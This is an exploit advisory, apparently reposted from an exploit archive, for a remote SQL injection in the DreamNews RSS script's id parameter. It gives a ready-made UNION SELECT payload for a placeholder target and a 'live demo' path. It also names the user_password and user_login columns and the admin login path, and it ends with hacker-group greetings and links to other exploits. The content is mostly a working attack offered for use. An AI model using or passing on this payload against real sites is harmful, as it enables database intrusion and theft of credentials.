#########################################################
#
# dreamnews ( rss) Remote SQL Injection Vulnerability
#========================================================
# Author: Hussin X =
# =
# Home : www.tryag.cc/cc =
# =
# email: darkangel_g85[at]Yahoo[DoT]com =
# =
#=========================================================
#
# script : /dreamnews.php
#
# DorK : N/A
#
##########################################################
Exploit:
www.[target].com/Script/dreamnews-rss.php?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,concat_ws(user(),version(),database()),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36--
L!VE DEMO:
/demo/dreamnews/dreamnews-rss.php?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,concat_ws(user(),version(),database()),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36--
column_name :
user_password
user_login
Admin Login :
/admin/
########################( Greetz )###########################
# #
# tryag.cc / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUR /str0ke #
# #
# Iraqihack / FAHD / mos_chori / Silic0n #
# #
#############################################################
Im IRAQi
【DreamNews Manager (id) Remote SQL Injection Vulnerability】相关文章:
★ IntelliTamper 2.07/2.08 Beta 4 A HREF Remote Buffer Overflow Exploit
★ eNdonesia 8.4 (Calendar Module) Remote SQL Injection Exploit
★ MojoPersonals (mojoClassified.cgi mojo) Blind SQL Injection Exploit
★ 无法定位序数459于动态链接urlmon.dll的解决办法
★ MojoAuto (mojoAuto.cgi mojo) Blind SQL Injection Exploit
★ BIND 9.x Remote DNS Cache Poisoning Flaw Exploit (c)
★ gapicms 9.0.2 (dirDepth) Remote File Inclusion Vulnerability
★ File Store PRO 3.2 Multiple Blind SQL Injection Vulnerabilities